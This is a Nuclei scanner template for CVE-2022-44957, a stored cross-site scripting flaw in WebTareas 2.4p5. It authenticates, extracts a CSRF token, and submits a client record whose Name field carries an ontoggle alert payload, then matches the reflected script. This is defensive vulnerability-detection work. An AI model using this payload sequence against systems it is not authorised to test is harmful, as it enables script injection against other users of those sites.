id: CVE-2022-44957

info:
  name: WebTareas 2.4p5 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
  reference:
    - http://webtareas.com/
    - https://github.com/anhdq201/webtareas/issues/11
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44957
    - http://webtareas.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-44957
    cwe-id: CWE-79
    epss-score: 0.00045
    epss-percentile: 0.12262
    cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: webtareas_project
    product: webtareas
  tags: cve,cve2022,xss,webtareas,authenticated,intrusive

http:
  - raw:
      - |
        POST /general/login.php?session=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525

        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="action"

        login
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginForm"

        {{username}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="passwordForm"

        {{password}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginSubmit"

        Log In
        -----------------------------3023071625140724693672385525--
      - |
        GET /clients/editclient.php? HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /clients/editclient.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061

        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="csrfToken"

        {{csrf}}
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="action"

        add
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="cown"

        1
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="cn"

        {{randstr}}<details/open/ontoggle=alert(document.domain)>
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="add"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="zip"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="ct"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="cou"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="wp"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="fa"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="url"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="email"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="curr"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="wc"

        1
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="pym"

        1
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="pyt"

        7
        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="c"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="ssc"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="file1"; filename=""
        Content-Type: application/octet-stream


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="attnam1"


        -----------------------------34025600472463336623659912061
        Content-Disposition: form-data; name="atttmp1"


        -----------------------------34025600472463336623659912061--

    host-redirects: true
    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '<details/open/ontoggle=alert(document.domain)>'
          - 'clients/listclients.php?'
        condition: and

      - type: word
        part: header_3
        words:
          - text/html

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="csrfToken" value="([0-9a-zA-Z]+)"'
        internal: true